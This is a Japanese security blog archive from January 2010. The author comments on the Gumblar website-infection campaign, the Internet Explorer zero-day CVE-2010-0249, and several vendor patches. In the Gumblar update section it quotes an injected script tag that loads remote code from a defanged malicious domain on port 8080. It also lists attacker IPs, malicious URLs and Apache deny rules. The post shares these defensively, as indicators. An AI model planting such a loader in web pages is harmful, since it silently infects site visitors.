Archive for 1 月 21st, 2010

[Rubbish] もうね~

Posted in Misc on 1 月 21st, 2010 by gnome

Segment #1
疲れた(多分に物理的に)

Segment #2
新カテゴリー誕生
ガンブラーウイルス対策まとめサイト
Gumblar.8080系
こ・・この発想(tar)はなかった orz

"とある^-^"プロキシサーバについて調査を行いました。"幸いなことに^-^;"、プロキシサーバの手前で、パケットキャプチャしていたデータが残存していたため、今回のスクリプトコードの書き換えが判明しました。
だ、だめだ、・・脱力・・・

設立趣意書
ぜひ、このテイストで続けてってください(笑)

日本のセキュリティの未来は明るい(違った意味で)

Segment #3
百度、米国のドメイン登録会社を提訴
絶対やってくれると信じてましたよ・・・・
誰かこの件で逆告訴してくれないかな・・
deny from 121.8.0.0/13
deny from 123.112.0.0/12
deny from 220.160.0.0/11
&おまけ
deny from 61.247.192.0/19 (Yeti aka Naver)
deny from 202.131.24.0/21 (Yeti aka Naver)
via : ロボ避けとアクセス制限のための覚え書き

Segment #4
「Boot Camp 3.1」で64ビット版Windows 7を試してみた
結果を先に書くと、Mac OS XとWindowsでは、Magic Mouseで提供される機能に大きな開きがある。まず、ボディ表面を指でなぞるスクロールは可能だが、360度ではなく上下方向しか動かない。また、 Mac OS Xではスクロール機能がデフォルトで慣性スクロールになっているが、これもサポートしていないようだ。1画面に収まらないページを閲覧する際に、マウスを指ではじくと画面がスルスルとすべり、指で押さえるとピタっと止まる心地よさは味わえない。2本指を使ったスワイプもできなかった。ただ、 control+スクロールでの画面の拡大/縮小は機能していた。
ざ・・ざんねん・・・orz

Segment #5
Firefox>セキュリティ
無駄なあがきです。
此岸から手招きしておこうっと(笑)

追記:
Segment #65535
Gumblar.8080系の攻撃手法が変化し、従来のシグネチャをまたも回避・・・・
<script> try{window.onload=function(){newEl = document.createElement('script');newEl.setAttribute('defer', '1');newEl.setAttribute('src', 'http://blogger-com.fandango.com.charter-net.authentictype・ru:8080/live.com/live.com/sina.com.cn/nhl.com/google.com/');document.body.appendChild(newEl);} } catch(T97uvnk9p ) {/*handle exception*/}</script>
<!--bf3885d6a0c53563f5c70fc18114aaad-->
鼬が一匹、鼬が二匹、鼬が・・・・・・

古い .ru ドメインが一掃された模様です。
EoF

2 Comments »

2010.01.22 木曜日

Posted in Announce, security on 1 月 21st, 2010 by gnome

ライバルが手を結ぶ日
慶応2年1月21日(旧暦。新暦では1866年3月7日)、坂本竜馬らの仲介により長州藩薩摩藩薩長同盟を結んだ。
料理番組の日
1937年のこの日、BBCが世界初の料理番組「夕べの料理」を開始したことにちなむ。
と、なってますけど、英語版wikipediaにすら項目がないほど不明な番組・・・(refer: 世界初の料理番組とされるイギリスBBCの「夕べの料理」・・・その番組の詳しい内容・写真資料などに関する情報を探しています。
日本テレビ系全国ネットで「キユーピー3分クッキング」放送開始。
聖アグネスの祝日 (304年)

----------
ソバ屋遅延
Internet Explorerのセキュリティ更新の事前告知 (定例外)
小野寺です。
Internet Explorer 6の悪用事例を確認 (セキュリティ アドバイザリ 979352)」でお伝えしている脆弱性に対応する更新プログラムを2010/1/22にリリースします。
余裕が消し飛んだ様子・・・

Advance Notification for Out-of-Band Bulletin Release
We will be releasing MS10-002 tomorrow, January 21st, 2010. We are planning to release the update as close to 10:00 a.m. PST (UTC -8) as possible.
01/21/10AM PST => 01/22/3AM JSTということで、明日までお待ちください。

これを書いている時点(AM7 JST)ではまだ日本版の更新がありませんが、本家ではアドバイザリ979352にいくつかの修正が入っています。
Data Execution Prevention (DEP) Bypass
The DEP bypass exploit is not, at this time, publicly available and we have not seen it used in attacks.
ASLRで防護されてるから、Vista上では動作してないはず!

Microsoft E-Mail Products That Render using mshtml.dll Protected by Default
There have been reports that supported versions of Outlook, Outlook Express and Windows Live Mail are affected by the vulnerability in Security Advisory 979352.
IEだけじゃなくて、Outlook、Outlook Express そして Windows Live Mailもこの脆弱性をうける・・っと

Other products may also use the HTML rendering engine for Internet Explorer and could expose this vulnerability.Trident系のエンジン使用の製品にも影響があることを初めて認めましたとさ~

Office Applications with Active Scripting Enabled Potentially Vulnerable
We are also aware that the vulnerability can be exploited by including an ActiveX control in a Microsoft Access, Word, Excel, or PowerPoint file. Customers would have to open a malicious file to be at risk of exploitation.
をぃをぃをぃ・・・・

STAY TUNED Microsoft Update !

続くらしい
----------
DEP回避
Reports of DEP being bypassed
Yesterday we heard reports of a commercially available exploit that bypasses DEP. This exploit was made available to a limited number of major security vendors (Antivirus, IDS, and IPS vendors) and government CERT agencies. We wanted to use this opportunity to give an overview of current customer risk related to this DEP bypass.

その、limited number of major security vendorsといわれた Vupenですが
Internet Explorer 0-Day - DEP Does Not Prevent Exploitation
While the public exploit only targets Internet Explorer 6 without DEP (Data Execution Prevention), VUPEN Security has confirmed reliable code execution with Internet Explorer 8 and permanent DEP enabled.
Enabling DEP will only protect your systems from public exploits, however, disabling JavaScript is the only way to prevent DEP bypass attacks.
と、自信満々のご様子

他のセキュ会社の反応が鈍いので、もう少し様子見(明日のパッチで解消されるのかどうか)ですかね~

まだ続く
----------
実際の様子(シス管の人は見ないほうがいいかも)
冷や汗出ました

IEのポインタ参照処理の脆弱性(CVE-2010-0249)に関する検証レポート
うひ~
完全にリモートログインされてるぢゃありませんか・・
このリバースパーサ・デーモンの出所はいったい!?

IEのポインタ参照処理の脆弱性(CVE-2010-0249)検証メモ
検証では、脆弱性の存在するターゲットPC(Windows XP SP2 & IE 6)で細工された応答を返すサーバにアクセスすることで脆弱性を利用した攻撃を行い、任意のサーバの任意のポートにコネクトバックさせ、結果、シェルを奪取するというものです。

今後、Gumbelr亜種が、この脆弱性を利用しはじめたりなんかして昨今のGumbler騒ぎに拍車がかからないことを祈っております。
# Gumber騒ぎは個人的にち食傷気味だったりするんですよね。
たぶんわざと・・・typoがあるのはともかく、本気でそう願います。

これは確かにIE/OutLook系の全面使用禁止を打ち出されてもしょうがないですね。

とどめ・・
----------
ぎゃ~す
不特定多数を対象としたMicrosoft Internet Explorerのゼロデイ脆弱性を狙う攻撃【Tokyo SOC Report】
先日、マイクロソフトより公開されたInternet Explorerの新たな脆弱性(*1)を狙う攻撃が不特定多数を対象に行われていることを確認しました。この攻撃は、Webサイト経由で行われています。以下は、攻撃元URLの例です。
ちょっとまった・ちょっとまった・ちょっとまった
1iegoogle.22sys22・cn/pz/au.htm
2iegoogle.22sys22・cn/pz/au.htm
3iegoogle.22sys22・cn/pz/au.htm

IE6使用中のところは、今すぐにでも使用を中止すべきです。
Revisiting the Internet Explorer Security Bug
I had just finished opening an account at the local bank late last week when I happened to catch a glimpse of the bank manager’s computer screen: He had about 20 Web browser windows open, and it was hard to ignore the fact that he was using Internet Explorer 6 to surf the Web.
For more than a second I paused, and considered asking for my deposit back.
うはははは

Govt issues IE security warning
オーストラリア政府も

え?まだあるの?
----------
そしてFirefoxへようこそ
German government IE warning leads to spike in Firefox downloads
People in Germany Are Switching Browsers
Operaかと思ってたけど、やっぱり Firefoxなんですね~

Firefoxを導入したら No-script, Firebug, IE_tab あたりは必須でしょうか?
他にもなにかあったら教えてください。
※NoScriptは必ず IFRAMEを禁止にしてください。

Firefox 3.6のリリースは日本時間の1月22日2:00AMを予定
Comming Soon

----------
一方・・16bit(Win3.1)アプリも
こっちはさっさと斬ってしまっていいと思うんですが・・
Windows hole discovered after 17 years - Update
The problem is caused by flaws in the Virtual DOS Machine (VDM) introduced in 1993 to support 16-bit applications (real mode applications for 8086). VDM is based on the Virtual 8086 Mode (VM86) in 80386 processors and, among other things, intercepts hardware routines such as BIOS calls.

XPの場合: 以下をエディタで開いて"vdmdisallow.reg"として保存
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat]

"VDMDisallowed"=dword:00000001
into a file called vdmdisallow.reg and double click the file. Windows will then automatically import the key (admin rights are required to perform this action).

Microsoft investigates 17-year-old Windows flaw

Windowsに新たな未修正の脆弱性、回避策の利用を

----------
しょっくうぇーぶ
Shockwaveってまだ必要なんですか?ほんとに(苦笑)
Security update available for Shockwave Player
Adobe recommends Shockwave Player users uninstall Shockwave version 11.5.2.602 and earlier on their systems, restart their systems, and install Shockwave version 11.5.6.606, available here: Get Shockwave.

Adobe Shockwave Player 3D Model Parsing Eight Vulnerabilities 4
8ですか・・
Security Bulletin - Adobe Shockwave Player
Adobe Releases Shockwave Player Update
Adobe fixes critical holes in Shockwave
Critical flaws haunt Adobe Shockwave Player

----------
Zero-DayのApple
もう一方のZERO-DAYの雄(笑)
セキュリティアップデート 2010-001 について
なんか、知らないのまで増えてるし・・

Apple Releases Security Update 2010-001
アップル、Mac OS X用「セキュリティアップデート2010-001」を公開
Apple Mac OS X Security Update Fixes Multiple Vulnerabilities 4
Apple Security Update 2010-001
Mac OS Xにパッチ、12件の重大なセキュリティホールを修正
Apple releases Security Update for Mac OS X

----------
まだまだっ(A PIT)

RealPlayer Multiple Vulnerabilities 4
またですか・・
Update to the latest version.

BIND 9 の DNSSEC 検証コードに脆弱性
遠隔の第三者によって、不正な NXDOMAIN レコードをキャッシュに追加される可能性があります。
BIND 9 DNSSEC validation code could cause bogus NXDOMAIN responses
ISC BIND DNSSEC CNAME / DNAME and NXDOMAIN Cache Poisoning Vulnerabilities 2

Pidgin MSN <= 2.6.4 File Download Vulnerability
Fixed in Pidgin 2.6.5 Update to the latest version.

----------
LGPL?
/*LGPL*/ infected files Clean-up/removal script
アンタノトコが ガンブラー™を主張したんだから最後まで責任取りなさいよね~
用語混乱させた責任は重いぞ~(笑)

というか、こんな怪しげな(hosted : possible.in) Script Cleanerなんか誰がつかうっていうんだか・・
堂々と Symantecの中にホストしなさいよ~
※出所不明の実行ファイルをダウンロードしてはいけません。

だいたい・・Scriptだけ削除してそれで再開できるほど甘いマルウェアじゃないことくらいそろそろ判ってるはず・・・
だけど、本気でわかってないのかしらん?
(まだCVE-2009-4324関連シグネチャはBloodHoundの状態)

LACさんも余裕ありげだけど・・
新春早々の「Gumblar一問一答」
JSOCのお客様でも感染被害やホームページ改ざん被害が継続しており、新年早々のんびりはできないようです。
ふ~ん
WAFで止めることはできますか?
NO!
ふ~ん

Tripwireを導入する
Tripwireによるホスト型IDSの構築
こっちのほうが役にたつかもですね~(重いけど)

しかし、セキュ会社がこれじゃ、今後が思い遣られますね・・・(嘆息)

微妙に続く
----------
失敗
「安全なウェブサイトの作り方 改訂第4版」を公開
~ ウェブアプリケーションに脆弱性を作り込んでしまった「失敗例」を拡充 ~

また新たに、WAF(Web Application Firewall)(*9)の活用に関して、WAFの動作原理、WAFの使用が有効な状況、導入検討における留意点を第2章に追記しました。
上で思いっきり否定されてますが・・・

----------
その他
時間切れですよ・・

iPhish - fake iPhone warranty steals info

Yahoo!フィッシング~容疑者グループ逮捕で偽サイト激減、今後の注意点は?

Operation Aurora (Deep Insight):
CVE-2010-0249 in the wild - xx222.8866.org and others – part 0 -- extraexploit

OpenLDAPからActive Directoryへ移行せよ――(1)
Active Directoryなら管理作業が楽になる!
!?

Using Curl to Retrieve Malicious Websites
cURL as cURL
Curlかと思ったのは内緒

----------
睡魔
ガンブラー vs 睡魔
ちなみに今日、とあるホームページを管理している係の人と話す事があったので
「最近こういうウイルスが流行ってるので~」
と忠告しといたんですが
「へー」と「ふーん」と「ほー」と「あ、そうなんですか」という返事しか返ってきませんでした。

ああ・・でじゃぶ・・

----------
8080
91.121.4.99 AS16276(OVH Paris)
91.121.7.26 AS16276(OVH Paris)
91.121.88.218 AS16276(OVH Paris)
94.23.206.229 AS16276(OVH Paris)
82.98.231.25 AS8455(ATOM86)
おかえりなさい > ATOM86

----------
Google Safe Browsing
| 1264017622 | B | [goog-black-hash 1.49243 update]
| 1264017607 | M | [goog-malware-hash 1.18778 update]
| 297655 | -268(297923) 減ってる減ってる・・
| 1264174 |
EoF

Leave A Comment »

ホットワード padding margin 疲れ 物理 カテゴリー
割引クーポンまとめ情報 - クー割